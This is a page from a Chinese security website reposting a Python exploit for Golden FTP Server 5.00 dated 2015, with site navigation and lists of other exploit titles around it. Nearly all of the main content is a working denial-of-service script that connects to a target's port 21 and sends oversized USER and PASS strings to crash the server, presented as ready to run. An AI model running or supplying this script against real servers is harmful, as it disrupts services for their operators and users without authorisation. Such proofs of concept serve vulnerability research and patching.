首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Golden FTP 5.00 Denial Of Service
来源:kfalus@gmail.com 作者:4Lu5h 发布时间:2015-06-05  
#!/usr/bin/python

#Both Golden Pro And Free FTP server is  prone to a remote DOS vulnerability.POC

#Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions.

#-------------------------------------------------------------------------
#Exploit Title : Golden FTP Server DOS vulnerability.
#Date   : 2015.06.01
#Exploit Author  : 4Lu5h
#Email   : kfalus@gmail.com
#Product Homepage: www.goldenftpserver.com
#Software Link  : http://www.goldenftpserver.com/statdir/stat.php?id=download_pro
#Product: Golden Pro FTP Server
#Version : 5.00
#Tested Os : Windows XP SP1/SP3 TR
#--------------------------------------------------------------------------


import socket
import sys

def usage():
	 print "usage  : ./goldenftp.py <ip > "
      	 print "example: ./goldenftp.py 192.168.189.19"

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)

if len(sys.argv) != 2:
        usage()
        sys.exit()

ip = sys.argv[1]

buff = "A" * 16379

try:
	print("[-] Connecting to " + ip + " for exploitation..\n")
	s.connect((ip,21))
	s.recv(1024)
	print "[-] Connected to server"
	print "[-] Sending exploit"
	s.send('USER '+buff+'\r\n') #if fails try username test 
	s.send('PASS '+buff+'\r\n')
	s.close()
	print("[-] Exploit successfully sent...")
except:
	print "[-] Exploit failed.. Check if server is up.."

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·JDownloader 2 Beta Directory T
·CmyDocument CMS Database Discl
·Jildi FTP Client 1.5.6 (SEH) B
·ProductCart 2.1 Database Discl
·Jildi FTP Client Buffer Overfl
·1 Click Audio Converter 2.3.6
·Seagate Central 2014.0410.0026
·1 Click Extract Audio 2.3.6 -
·Seagate Central 2014.0410.0026
·Beckhoff IPC Diagnositcs Authe
·PonyOS <= 3.0 - tty ioctl() Lo
·Microsoft Windows HTA Crash Pr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved